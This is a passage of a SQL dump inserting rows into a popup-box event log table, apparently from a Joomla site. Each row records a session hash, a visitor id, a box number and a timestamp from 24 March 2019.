(73162, 'ad001fb0dd39b0cddb9bbfffacdc4079', 'a6cf4603608c8ad7', 0, 2, 1, '2019-03-24 06:41:51'),
(73163, '687697e5c61b6966aec00eb9f62859c6', '7ec969d351bcf68e', 0, 2, 1, '2019-03-24 06:42:07'),
(73164, '81367c8a83ad6a6ea65e6468d0540fae', 'f10990f26adcd1c5', 0, 2, 1, '2019-03-24 06:42:17'),
(73165, 'afa81e9b6e85f31184851046e75bafa9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-03-24 06:43:17'),
(73166, 'a07dee9c7a2b6a87486452052e13fbce', '93f30eaefda9d8c4', 0, 2, 1, '2019-03-24 06:44:08'),
(73167, '8173a3ae16cd0053f797373d045474c2', '332723ec6654d9f5', 0, 2, 1, '2019-03-24 06:44:13'),
(73168, '8173a3ae16cd0053f797373d045474c2', '332723ec6654d9f5', 0, 2, 1, '2019-03-24 06:44:19'),
(73169, '13b9b1c909c23499e96fde9c91f20e22', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-24 06:46:27'),
(73170, '9e782d705ede2feef02fd25ff579ee78', 'a8eb7b68de30910b', 0, 2, 1, '2019-03-24 06:46:42'),
(73171, '9e782d705ede2feef02fd25ff579ee78', 'a8eb7b68de30910b', 0, 2, 1, '2019-03-24 06:47:01'),
(73172, '9e782d705ede2feef02fd25ff579ee78', 'a8eb7b68de30910b', 0, 2, 1, '2019-03-24 06:48:33'),
(73173, 'e0c68f07c5a43081f671190348f3839f', 'f4daa31c6f826494', 0, 2, 1, '2019-03-24 06:48:40'),
(73174, '3273fc3015106656ec071c5dafd9b823', 'a7a7b4bbea82be21', 0, 2, 1, '2019-03-24 06:48:47'),
(73175, 'e0c68f07c5a43081f671190348f3839f', 'f4daa31c6f826494', 0, 2, 1, '2019-03-24 06:49:25'),
(73176, '8173a3ae16cd0053f797373d045474c2', '332723ec6654d9f5', 0, 2, 1, '2019-03-24 06:49:36'),
(73177, '8173a3ae16cd0053f797373d045474c2', '332723ec6654d9f5', 0, 2, 1, '2019-03-24 06:50:02'),
(73178, 'a07dee9c7a2b6a87486452052e13fbce', '93f30eaefda9d8c4', 0, 2, 1, '2019-03-24 06:50:26'),
(73179, '9e782d705ede2feef02fd25ff579ee78', 'a8eb7b68de30910b', 0, 2, 1, '2019-03-24 06:50:45'),
(73180, 'afa81e9b6e85f31184851046e75bafa9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-03-24 06:50:57'),
(73181, 'c5d91de2c4466d524100f75ba868fbba', '32b169e936bbe5df', 0, 2, 1, '2019-03-24 06:51:08'),
(73182, '9e782d705ede2feef02fd25ff579ee78', 'a8eb7b68de30910b', 0, 2, 1, '2019-03-24 06:51:47'),
(73183, '9e782d705ede2feef02fd25ff579ee78', 'a8eb7b68de30910b', 0, 2, 1, '2019-03-24 06:52:13'),
(73184, 'ad001fb0dd39b0cddb9bbfffacdc4079', 'a6cf4603608c8ad7', 0, 2, 1, '2019-03-24 06:52:24'),
(73185, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-24 06:52:28'),
(73186, '14a377d9ea403677a75909137bdb73aa', '503a514a8daa32a7', 0, 2, 1, '2019-03-24 06:53:07'),
(73187, 'afa81e9b6e85f31184851046e75bafa9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-03-24 06:53:33'),
(73188, '633eee29f1ba1a6cdc635d229f18e540', '7501b42c35accff7', 0, 2, 1, '2019-03-24 06:53:58'),
(73189, 'c99a0847c818d9b7185052b67b215539', 'f19010d8a5f137d0', 0, 2, 1, '2019-03-24 06:54:11'),
(73190, '9ecf0ba6ae0ad8b57dfe3a1f266eb1c6', '155a6ebefb18c97a', 0, 2, 1, '2019-03-24 06:54:15'),
(73191, '19fe9653ec0e5b48ecb1adf70bda3ac0', '0bf16c319bd2f666', 0, 2, 1, '2019-03-24 06:54:58'),
(73192, '9d991758cbca83d104b28aa932bbf00b', '6eaef0e2df5f44f7', 0, 2, 1, '2019-03-24 06:58:12'),
(73193, '89073288e44454f7d3984b54d59564cc', 'df27b9a2919a8206', 0, 2, 1, '2019-03-24 06:59:18'),
(73194, 'c76cfc0858520b3c9a9044aeb3ab4c0c', '1e8786f2f88c192b', 0, 2, 1, '2019-03-24 06:59:26'),
(73195, '60512fd1ccba157e1925a42597678413', 'edf2c421aa613309', 0, 2, 1, '2019-03-24 06:59:27'),
(73196, '57acf7eb71e84a431c3396d27c4943c7', '76ed9cbc7a5d0626', 0, 2, 1, '2019-03-24 06:59:42'),
(73197, 'd6966f02dc3abf673e06233467852f48', '8e94e7efad43584b', 0, 2, 1, '2019-03-24 06:59:45'),
(73198, '01b81d24710764114b69d294841cb87e', 'a241b97c40d2b2c5', 0, 2, 1, '2019-03-24 07:00:31'),
(73199, '89073288e44454f7d3984b54d59564cc', 'df27b9a2919a8206', 0, 2, 1, '2019-03-24 07:00:32'),
(73200, '6fd55c90303b352ae6f60c3bb03976f0', 'ef33699b366746ed', 0, 2, 1, '2019-03-24 07:01:39'),
(73201, 'ad001fb0dd39b0cddb9bbfffacdc4079', 'a6cf4603608c8ad7', 0, 2, 1, '2019-03-24 07:01:42'),
(73202, '6cd3f3a5698233ab62cf20e5d5d4a23c', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-24 07:01:52');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(73203, '2e02b0fd9c12251be6af5fdb34f2f809', 'b75ecb2981287658', 0, 2, 1, '2019-03-24 07:04:35'),
(73204, '0cd69e7e4f9d7c1e91076b843df135e1', '3e74d6b7f7b1f0fe', 0, 2, 1, '2019-03-24 07:04:35'),
(73205, '1281049dd0f9f9bf9dd13461fd1454ed', '66cd2ffd1b716f5a', 0, 2, 1, '2019-03-24 07:04:39'),
(73206, '1281049dd0f9f9bf9dd13461fd1454ed', '66cd2ffd1b716f5a', 0, 2, 1, '2019-03-24 07:04:41'),
(73207, '2e02b0fd9c12251be6af5fdb34f2f809', 'b75ecb2981287658', 0, 2, 1, '2019-03-24 07:05:37'),
(73208, '2e44be20713de4b89fcbe18043872535', '9bd6c23c7090db5b', 0, 2, 1, '2019-03-24 07:06:10'),
(73209, '6fd55c90303b352ae6f60c3bb03976f0', 'ef33699b366746ed', 0, 2, 1, '2019-03-24 07:07:23'),
(73210, 'b1b518860ba8c414babf9c9721c14704', '5ce557a8e483a113', 0, 2, 1, '2019-03-24 07:09:38'),
(73211, '6fd55c90303b352ae6f60c3bb03976f0', 'ef33699b366746ed', 0, 2, 1, '2019-03-24 07:09:49'),
(73212, '633eee29f1ba1a6cdc635d229f18e540', '7501b42c35accff7', 0, 2, 1, '2019-03-24 07:09:54'),
(73213, '85c12a852e8d5006b4469146a0ef2fe4', '324d0c5c1f480926', 0, 2, 1, '2019-03-24 07:10:45'),
(73214, '85c12a852e8d5006b4469146a0ef2fe4', '324d0c5c1f480926', 0, 2, 1, '2019-03-24 07:10:45'),
(73215, '6cd3f3a5698233ab62cf20e5d5d4a23c', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-24 07:11:22'),
(73216, 'afa81e9b6e85f31184851046e75bafa9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-03-24 07:11:30'),
(73217, '2e44be20713de4b89fcbe18043872535', '9bd6c23c7090db5b', 0, 2, 1, '2019-03-24 07:12:21'),
(73218, '6fd55c90303b352ae6f60c3bb03976f0', 'ef33699b366746ed', 0, 2, 1, '2019-03-24 07:14:00'),
(73219, '85c12a852e8d5006b4469146a0ef2fe4', '324d0c5c1f480926', 0, 2, 1, '2019-03-24 07:14:45'),
(73220, '48cfee7c250b527e125bac717123cfd7', '7775b26e7cf725ed', 0, 2, 1, '2019-03-24 07:14:50'),
(73221, '66376def9e722784dd5dddf115a9aaf8', 'b32d89f327a39738', 0, 2, 1, '2019-03-24 07:15:24'),
(73222, 'a07dee9c7a2b6a87486452052e13fbce', '93f30eaefda9d8c4', 0, 2, 1, '2019-03-24 07:17:38'),
(73223, '76d6358f43eb7c6363859b2d48c52f8b', '8607243faf915263', 0, 2, 1, '2019-03-24 07:17:42'),
(73224, 'e4cadca81f55d2560946f3db907411c7', '353e2c8924436e84', 0, 2, 1, '2019-03-24 07:18:11'),
(73225, 'f3b639e28d13e09ca9c4d8023b3fa08c', '5e1dd91b426ab341', 0, 2, 1, '2019-03-24 07:19:06'),
(73226, '636550e2d51e663b3571b11a501c7c97', '214aac21c6070262', 0, 2, 1, '2019-03-24 07:19:14'),
(73227, '636550e2d51e663b3571b11a501c7c97', '214aac21c6070262', 0, 2, 1, '2019-03-24 07:19:16'),
(73228, 'c7d1b4740991d6cde2ba37c506d0b883', '4aba70faa7722502', 0, 2, 1, '2019-03-24 07:19:24'),
(73229, 'c7d1b4740991d6cde2ba37c506d0b883', '4aba70faa7722502', 0, 2, 1, '2019-03-24 07:20:00'),
(73230, '6cd3f3a5698233ab62cf20e5d5d4a23c', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-24 07:20:25'),
(73231, 'af345df4e7ccbee725558e7725c98fcb', 'a37c2c3b739af2fa', 0, 2, 1, '2019-03-24 07:22:10'),
(73232, 'f3b639e28d13e09ca9c4d8023b3fa08c', '5e1dd91b426ab341', 0, 2, 1, '2019-03-24 07:22:17'),
(73233, 'af345df4e7ccbee725558e7725c98fcb', 'a37c2c3b739af2fa', 0, 2, 1, '2019-03-24 07:22:39'),
(73234, 'ad001fb0dd39b0cddb9bbfffacdc4079', 'a6cf4603608c8ad7', 0, 2, 1, '2019-03-24 07:22:40'),
(73235, 'af345df4e7ccbee725558e7725c98fcb', 'a37c2c3b739af2fa', 0, 2, 1, '2019-03-24 07:22:54'),
(73236, '673af897663de97baf5bae5ef33b9af1', 'fc8570f60f5891f4', 0, 2, 1, '2019-03-24 07:27:10'),
(73237, 'ee9769818cd66330b475e5621fe48a4b', 'c4c9002176fd8f74', 0, 2, 1, '2019-03-24 07:27:12'),
(73238, '8121c42eaadeb3054a080bf6ddd8df0c', '624d6937076d1188', 0, 2, 1, '2019-03-24 07:27:18'),
(73239, 'd03f7d1d8351ac3111a6e7dc75688b51', 'f10990f26adcd1c5', 0, 2, 1, '2019-03-24 07:29:55'),
(73240, 'd03f7d1d8351ac3111a6e7dc75688b51', 'f10990f26adcd1c5', 0, 2, 1, '2019-03-24 07:30:12'),
(73241, '14a377d9ea403677a75909137bdb73aa', '503a514a8daa32a7', 0, 2, 1, '2019-03-24 07:30:29'),
(73242, 'b1add8c8773a1107652190b869fa3453', 'c963781c54ef5fb6', 0, 2, 1, '2019-03-24 07:30:46'),
(73243, 'b47f15249ac9b0c3a0fbbc8ca9b2f352', 'd1c27eb4adc98518', 0, 2, 1, '2019-03-24 07:30:46'),
(73244, 'b1add8c8773a1107652190b869fa3453', 'c963781c54ef5fb6', 0, 2, 1, '2019-03-24 07:30:59'),
(73245, 'afa81e9b6e85f31184851046e75bafa9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-03-24 07:31:30'),
(73246, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-24 07:31:31'),
(73247, 'd4c5d66bae3d855d7bc8726591da7ce7', '546887b39507976e', 0, 2, 1, '2019-03-24 07:31:33'),
(73248, 'c76cfc0858520b3c9a9044aeb3ab4c0c', '1e8786f2f88c192b', 0, 2, 1, '2019-03-24 07:31:36'),
(73249, '59814b6fc1d1886bde22e8d18c85cfea', 'c82195f7827b9487', 0, 2, 1, '2019-03-24 07:31:52'),
(73250, 'aec3a8019b01eeceeaab3ffc04de48e9', 'f4095732e63c9841', 0, 2, 1, '2019-03-24 07:32:38'),
(73251, '6a42fc30246658617856113f8073f090', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-24 07:33:00'),
(73252, '34e0ce976063e6a8ee36aabbd5bfdb50', '16c85ef0dbd5ed3f', 0, 2, 1, '2019-03-24 07:35:00'),
(73253, '304f4deb6f67213d6cb01ca723bbcfcd', '8a144e5fc2e94311', 0, 2, 1, '2019-03-24 07:35:04'),
(73254, 'a7aa0f8d8518ae4b412e244d282783b9', 'c40b91be6bbcf435', 0, 2, 1, '2019-03-24 07:35:14'),
(73255, 'bf45faae89a56492c2583399943ad062', '67cc0c783670bfcb', 0, 2, 1, '2019-03-24 07:35:44'),
(73256, 'c147a7c2a200ca4b5f642d3e96ee961e', 'cea6daea8d553bc2', 0, 2, 1, '2019-03-24 07:36:13'),
(73257, 'bf45faae89a56492c2583399943ad062', '67cc0c783670bfcb', 0, 2, 1, '2019-03-24 07:36:36'),
(73258, 'bf45faae89a56492c2583399943ad062', '67cc0c783670bfcb', 0, 2, 1, '2019-03-24 07:36:47'),
(73259, 'b725c1cf32ff9091b57086275e84d552', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-24 07:38:29'),
(73260, '47e202f85f371967027670eb79d12b59', '8c117e9ade9703d1', 0, 2, 1, '2019-03-24 07:39:35'),
(73261, '03e5f3ef7d3e43e075111345bacb65bf', '812ef4927322e0e5', 0, 2, 1, '2019-03-24 07:40:07'),
(73262, '28245fa26bd7d4b45fba9e350a278d62', '9cebf93c538a54a2', 0, 2, 1, '2019-03-24 07:40:28'),
(73263, '208fa0b904b6d5225707476f73933bcd', 'f6999729b75ea54b', 0, 2, 1, '2019-03-24 07:40:37'),
(73264, '304f4deb6f67213d6cb01ca723bbcfcd', '8a144e5fc2e94311', 0, 2, 1, '2019-03-24 07:41:29'),
(73265, '673af897663de97baf5bae5ef33b9af1', 'fc8570f60f5891f4', 0, 2, 1, '2019-03-24 07:41:36'),
(73266, '304f4deb6f67213d6cb01ca723bbcfcd', '8a144e5fc2e94311', 0, 2, 1, '2019-03-24 07:42:45'),
(73267, 'c4f9a797ce06ad9558d20b9c1e7d76c5', '3e9a5f85df12594b', 0, 2, 1, '2019-03-24 07:42:57'),
(73268, '6cd3f3a5698233ab62cf20e5d5d4a23c', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-24 07:43:13'),
(73269, 'b4c92d963d72f4d9d6b200fddcffd084', '0e65a12316be14d6', 0, 2, 1, '2019-03-24 07:43:49'),
(73270, 'b4c92d963d72f4d9d6b200fddcffd084', '0e65a12316be14d6', 0, 2, 1, '2019-03-24 07:44:03'),
(73271, 'a548d22c7c62c8e10f10a3499037e581', 'b3fb8540efdab4b7', 0, 2, 1, '2019-03-24 07:44:13'),
(73272, 'b4c92d963d72f4d9d6b200fddcffd084', '0e65a12316be14d6', 0, 2, 1, '2019-03-24 07:44:26'),
(73273, 'f2a0343aeb10ec5d75c4a6fb464727f5', 'e68d3b2c8eec981c', 0, 2, 1, '2019-03-24 07:44:36'),
(73274, 'b7517c6912d0985f1bb7a4468202e4cc', 'bb6f3506d5f1aec1', 0, 2, 1, '2019-03-24 07:44:45'),
(73275, '4ecb532bfd8150f13a7c7a1e1dfca5f4', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-03-24 07:44:58'),
(73276, '27179164fd2d5d24e2247a566d0a4a9d', '31a044ae3a085b94', 0, 2, 1, '2019-03-24 07:45:05'),
(73277, 'a548d22c7c62c8e10f10a3499037e581', 'b3fb8540efdab4b7', 0, 2, 1, '2019-03-24 07:45:19'),
(73278, '4ecb532bfd8150f13a7c7a1e1dfca5f4', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-03-24 07:45:44'),
(73279, '2e5f1ff16f1f01204c4791315f2a9fbd', '0c1826963d256ce7', 0, 2, 1, '2019-03-24 07:45:49'),
(73280, '304f4deb6f67213d6cb01ca723bbcfcd', '8a144e5fc2e94311', 0, 2, 1, '2019-03-24 07:46:16'),
(73281, 'ad001fb0dd39b0cddb9bbfffacdc4079', 'a6cf4603608c8ad7', 0, 2, 1, '2019-03-24 07:47:14'),
(73282, '1b761b6091280268ef65558b3b11a47c', 'f7fef20839e7b60f', 0, 2, 1, '2019-03-24 07:47:40'),
(73283, 'fb1a2121b11bf08109c6b6f39d3480a0', '0b797fb53ae15810', 0, 2, 1, '2019-03-24 07:47:48'),
(73284, 'e4cadca81f55d2560946f3db907411c7', '353e2c8924436e84', 0, 2, 1, '2019-03-24 07:48:26'),
(73285, '7bc7cada6d61c5004bcf4c2505078fa3', '8bf4306b09063bb5', 0, 2, 1, '2019-03-24 07:49:08'),
(73286, '9fd87475e797670e4170b0d0430be142', '0c1826963d256ce7', 0, 2, 1, '2019-03-24 07:50:20'),
(73287, 'a548d22c7c62c8e10f10a3499037e581', 'b3fb8540efdab4b7', 0, 2, 1, '2019-03-24 07:50:55'),
(73288, 'e4cadca81f55d2560946f3db907411c7', '353e2c8924436e84', 0, 2, 1, '2019-03-24 07:52:52'),
(73289, 'dd5226e6c15000c66a43bc5c0ef97e24', '8715f328cff8577d', 0, 2, 1, '2019-03-24 07:53:05'),
(73290, 'afa81e9b6e85f31184851046e75bafa9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-03-24 07:54:05'),
(73291, '14a377d9ea403677a75909137bdb73aa', '503a514a8daa32a7', 0, 2, 1, '2019-03-24 07:54:24'),
(73292, '709b2f22dcf7ae8ee6157c0e0d428a27', '0c3b18a297f7fa46', 0, 2, 1, '2019-03-24 07:54:41'),
(73293, '7bc7cada6d61c5004bcf4c2505078fa3', '8bf4306b09063bb5', 0, 2, 1, '2019-03-24 07:55:52'),
(73294, 'a548d22c7c62c8e10f10a3499037e581', 'b3fb8540efdab4b7', 0, 2, 1, '2019-03-24 07:59:29'),
(73295, '51d9aeb5f5ffafdbe1d45a9964495a27', 'dfe99e0afb28dc05', 0, 2, 1, '2019-03-24 08:00:24'),
(73296, '673af897663de97baf5bae5ef33b9af1', 'fc8570f60f5891f4', 0, 2, 1, '2019-03-24 08:00:26'),
(73297, 'af345df4e7ccbee725558e7725c98fcb', 'a37c2c3b739af2fa', 0, 2, 1, '2019-03-24 08:01:11'),
(73298, 'af345df4e7ccbee725558e7725c98fcb', 'a37c2c3b739af2fa', 0, 2, 1, '2019-03-24 08:01:14'),
(73299, 'a548d22c7c62c8e10f10a3499037e581', 'b3fb8540efdab4b7', 0, 2, 1, '2019-03-24 08:04:28'),
(73300, 'af345df4e7ccbee725558e7725c98fcb', 'a37c2c3b739af2fa', 0, 2, 1, '2019-03-24 08:05:51'),
(73301, '6cd3f3a5698233ab62cf20e5d5d4a23c', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-24 08:07:44'),
(73302, 'bbf2982f1eb9cca5f3729044110a35b2', '55dc1e480336967d', 0, 2, 1, '2019-03-24 08:07:59'),
(73303, 'bbf2982f1eb9cca5f3729044110a35b2', '55dc1e480336967d', 0, 2, 1, '2019-03-24 08:08:14'),
(73304, 'bbf2982f1eb9cca5f3729044110a35b2', '55dc1e480336967d', 0, 2, 1, '2019-03-24 08:09:05'),
(73305, 'bbf2982f1eb9cca5f3729044110a35b2', '55dc1e480336967d', 0, 2, 1, '2019-03-24 08:09:38'),
(73306, 'ebd17475b38560dddab50f7e29071c0a', 'ab8793adf31bf25e', 0, 2, 1, '2019-03-24 08:09:51'),
(73307, '6cd3f3a5698233ab62cf20e5d5d4a23c', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-24 08:10:06'),
(73308, 'e6d547f2b50211405cf06fa0de5b0476', '8c117e9ade9703d1', 0, 2, 1, '2019-03-24 08:11:35'),
(73309, '6cd3f3a5698233ab62cf20e5d5d4a23c', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-24 08:12:16'),
(73310, '6cd3f3a5698233ab62cf20e5d5d4a23c', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-24 08:13:11'),
(73311, '6fd55c90303b352ae6f60c3bb03976f0', 'ef33699b366746ed', 0, 2, 1, '2019-03-24 08:13:44'),
(73312, '0cd69e7e4f9d7c1e91076b843df135e1', '3e74d6b7f7b1f0fe', 0, 2, 1, '2019-03-24 08:14:22'),
(73313, '471fd00fc4800e5a820f3b8179b562c2', '8c34661937b8cc63', 0, 2, 1, '2019-03-24 08:14:35'),
(73314, '6981498e9b6743fd484ddbddb09c2f0e', 'bb6f3506d5f1aec1', 0, 2, 1, '2019-03-24 08:15:33'),
(73315, '6cd3f3a5698233ab62cf20e5d5d4a23c', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-24 08:16:53'),
(73316, '8392c82adc4b0580e840812471a1696d', 'c54fea6605d840ff', 0, 2, 1, '2019-03-24 08:17:53'),
(73317, '2a3a342e22d60b28b9114eb34510fdb0', '37c6d85bc2eb625e', 0, 2, 1, '2019-03-24 08:18:18'),
(73318, '8392c82adc4b0580e840812471a1696d', 'c54fea6605d840ff', 0, 2, 1, '2019-03-24 08:18:23'),
(73319, '6cd3f3a5698233ab62cf20e5d5d4a23c', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-24 08:23:49'),
(73320, '152da28d92ef5e269e4956661278d06b', 'c37dd7ffbb76fe3a', 0, 2, 1, '2019-03-24 08:24:59'),
(73321, 'ad001fb0dd39b0cddb9bbfffacdc4079', 'a6cf4603608c8ad7', 0, 2, 1, '2019-03-24 08:25:14'),
(73322, '6cd3f3a5698233ab62cf20e5d5d4a23c', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-24 08:25:22'),
(73323, '5e19985e266c10994173e13f22c5f4a7', 'b9974a919762d897', 0, 2, 1, '2019-03-24 08:34:27'),
(73324, '6cd3f3a5698233ab62cf20e5d5d4a23c', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-24 08:36:04'),
(73325, '5e19985e266c10994173e13f22c5f4a7', 'b9974a919762d897', 0, 2, 1, '2019-03-24 08:37:32'),
(73326, '4c986170bac620a81bf98bc8f39c541e', 'a4606350cb27c277', 0, 2, 1, '2019-03-24 08:39:50'),
(73327, 'e9eff80d52a560f1ee03686bef271595', '4c5e40b1232e8bef', 0, 2, 1, '2019-03-24 08:41:10'),
(73328, '359d2dfe4672dee9a18425dcb1aa701a', 'c370c7e3b7ec5c92', 0, 2, 1, '2019-03-24 08:43:00'),
(73329, '359d2dfe4672dee9a18425dcb1aa701a', 'c370c7e3b7ec5c92', 0, 2, 1, '2019-03-24 08:43:12'),
(73330, '6cd3f3a5698233ab62cf20e5d5d4a23c', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-24 08:44:07'),
(73331, '6cd3f3a5698233ab62cf20e5d5d4a23c', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-24 08:44:30'),
(73332, '99dcf9b517659ba952c244280874707f', '84201371881b1fb9', 0, 2, 1, '2019-03-24 08:45:09'),
(73333, '5abab8d5cc0bca29b8522ebe75bd4286', '6eaef0e2df5f44f7', 0, 2, 1, '2019-03-24 08:47:47'),
(73334, '5abab8d5cc0bca29b8522ebe75bd4286', '6eaef0e2df5f44f7', 0, 2, 1, '2019-03-24 08:47:55'),
(73335, '21f1bd8e970d6326924abe7ee8ec7ca6', 'b3fb8540efdab4b7', 0, 2, 1, '2019-03-24 08:48:15'),
(73336, '3f93da3439593f6853d45c10f13cd03a', '9ed85e6813f67863', 0, 2, 1, '2019-03-24 08:51:03'),
(73337, 'fcaf5440e537e2ed42568f4e53fc674c', 'dee0189c9a93ff94', 0, 2, 1, '2019-03-24 08:51:18'),
(73338, '3f93da3439593f6853d45c10f13cd03a', '9ed85e6813f67863', 0, 2, 1, '2019-03-24 08:52:04'),
(73339, '0bc7b1bd7e96ccb3d05ff658af124345', '45cfe2fe1891ae30', 0, 2, 1, '2019-03-24 08:52:46'),
(73340, '1963e8b27f3c2a02fc068eab4511a96d', 'f4095732e63c9841', 0, 2, 1, '2019-03-24 08:52:51'),
(73341, '6fd55c90303b352ae6f60c3bb03976f0', 'ef33699b366746ed', 0, 2, 1, '2019-03-24 08:56:25'),
(73342, '6cd3f3a5698233ab62cf20e5d5d4a23c', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-24 08:57:10'),
(73343, '4dbf5af0043718456e6baffb610f0bda', '19bcc476e66aa8b8', 0, 2, 1, '2019-03-24 08:57:54'),
(73344, '4dbf5af0043718456e6baffb610f0bda', '19bcc476e66aa8b8', 0, 2, 1, '2019-03-24 08:58:09'),
(73345, '0bc7b1bd7e96ccb3d05ff658af124345', '45cfe2fe1891ae30', 0, 2, 1, '2019-03-24 08:58:55'),
(73346, 'a10898ca4b85a4ebd22cdadafb22ce69', 'b26ec4c09b437bf3', 0, 2, 1, '2019-03-24 09:02:18'),
(73347, 'c5d91de2c4466d524100f75ba868fbba', '32b169e936bbe5df', 0, 2, 1, '2019-03-24 09:03:00'),
(73348, '6fd55c90303b352ae6f60c3bb03976f0', 'ef33699b366746ed', 0, 2, 1, '2019-03-24 09:03:14'),
(73349, '6fd55c90303b352ae6f60c3bb03976f0', 'ef33699b366746ed', 0, 2, 1, '2019-03-24 09:04:46'),
(73350, '16f937f88a9daf089f783fb3b0d6923e', '3a5ebfb9d161d18a', 0, 2, 1, '2019-03-24 09:05:33'),
(73351, '16f937f88a9daf089f783fb3b0d6923e', '3a5ebfb9d161d18a', 0, 2, 1, '2019-03-24 09:07:17'),
(73352, '6fd55c90303b352ae6f60c3bb03976f0', 'ef33699b366746ed', 0, 2, 1, '2019-03-24 09:08:02'),
(73353, '0bc7b1bd7e96ccb3d05ff658af124345', '45cfe2fe1891ae30', 0, 2, 1, '2019-03-24 09:08:08'),
(73354, '670f41b6032e79b0a1ff55c2e80fa5b2', '3b3d451ccbd27f2a', 0, 2, 1, '2019-03-24 09:10:22'),
(73355, '1963e8b27f3c2a02fc068eab4511a96d', 'f4095732e63c9841', 0, 2, 1, '2019-03-24 09:13:22'),
(73356, '6cd3f3a5698233ab62cf20e5d5d4a23c', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-24 09:14:57'),
(73357, '999043cf4c42b7edb4df936ee01764eb', 'b301d833ea94d585', 0, 2, 1, '2019-03-24 09:18:16'),
(73358, '999043cf4c42b7edb4df936ee01764eb', 'b301d833ea94d585', 0, 2, 1, '2019-03-24 09:18:45'),
(73359, 'c67f2b2c662fb1ba644535c0b5c32492', 'b3bf3468e0c56f69', 0, 2, 1, '2019-03-24 09:21:25'),
(73360, 'a84403b964f52a61b8b18d473dcae4cf', 'b2bafb74467116e9', 0, 2, 1, '2019-03-24 09:22:47'),
(73361, '022e0d328427f47bd35af1a8241b186c', '63df6d17de2ba967', 0, 2, 1, '2019-03-24 09:23:30'),
(73362, '022e0d328427f47bd35af1a8241b186c', '63df6d17de2ba967', 0, 2, 1, '2019-03-24 09:23:45'),
(73363, 'd31f46860315cca6ab792686f1d7dd92', '7e9c900c5365c97e', 0, 2, 1, '2019-03-24 09:24:25'),
(73364, '022e0d328427f47bd35af1a8241b186c', '63df6d17de2ba967', 0, 2, 1, '2019-03-24 09:26:06'),
(73365, '2a3a342e22d60b28b9114eb34510fdb0', '37c6d85bc2eb625e', 0, 2, 1, '2019-03-24 09:32:56'),
(73366, '6ba07503e04b9d346285ee88850db62a', '0a89162498b4a9f3', 0, 2, 1, '2019-03-24 09:33:04'),
(73367, 'd31f46860315cca6ab792686f1d7dd92', '7e9c900c5365c97e', 0, 2, 1, '2019-03-24 09:33:11'),
(73368, 'd31f46860315cca6ab792686f1d7dd92', '7e9c900c5365c97e', 0, 2, 1, '2019-03-24 09:33:34'),
(73369, '6cd3f3a5698233ab62cf20e5d5d4a23c', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-24 09:33:52'),
(73370, 'd31f46860315cca6ab792686f1d7dd92', '7e9c900c5365c97e', 0, 2, 1, '2019-03-24 09:35:07'),
(73371, 'c76cfc0858520b3c9a9044aeb3ab4c0c', '1e8786f2f88c192b', 0, 2, 1, '2019-03-24 09:37:23'),
(73372, '82b20249449d5154c60eeaf262aa2b92', '38b8ed62a14bd136', 0, 2, 1, '2019-03-24 09:37:28'),
(73373, '85c12a852e8d5006b4469146a0ef2fe4', '324d0c5c1f480926', 0, 2, 1, '2019-03-24 09:40:50'),
(73374, 'e4cadca81f55d2560946f3db907411c7', '353e2c8924436e84', 0, 2, 1, '2019-03-24 09:43:38'),
(73375, '34a69f202837e1189134a289435b0eb0', '402692e46d0378b1', 0, 2, 1, '2019-03-24 09:43:45'),
(73376, '85c12a852e8d5006b4469146a0ef2fe4', '324d0c5c1f480926', 0, 2, 1, '2019-03-24 09:43:59'),
(73377, 'ff8d4cf6d135d730f3f26004ca24d213', '8258129cba33891f', 0, 2, 1, '2019-03-24 09:44:23'),
(73378, '216d43ecef99eaf49e0eee262465fb1a', 'b3bf3468e0c56f69', 0, 2, 1, '2019-03-24 09:46:20'),
(73379, '0bc7b1bd7e96ccb3d05ff658af124345', '45cfe2fe1891ae30', 0, 2, 1, '2019-03-24 09:51:16'),
(73380, '14cfd3bbf4d67cb9b246fe0686d3cafe', '939fbcee39b8c410', 0, 2, 1, '2019-03-24 09:51:53'),
(73381, '6cd3f3a5698233ab62cf20e5d5d4a23c', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-24 09:52:58'),
(73382, 'c5d91de2c4466d524100f75ba868fbba', '32b169e936bbe5df', 0, 2, 1, '2019-03-24 09:53:55'),
(73383, '6fd55c90303b352ae6f60c3bb03976f0', 'ef33699b366746ed', 0, 2, 1, '2019-03-24 09:54:00'),
(73384, 'b47f15249ac9b0c3a0fbbc8ca9b2f352', 'd1c27eb4adc98518', 0, 2, 1, '2019-03-24 09:54:28'),
(73385, '85c12a852e8d5006b4469146a0ef2fe4', '324d0c5c1f480926', 0, 2, 1, '2019-03-24 09:55:24'),
(73386, '85c12a852e8d5006b4469146a0ef2fe4', '324d0c5c1f480926', 0, 2, 1, '2019-03-24 09:55:51'),
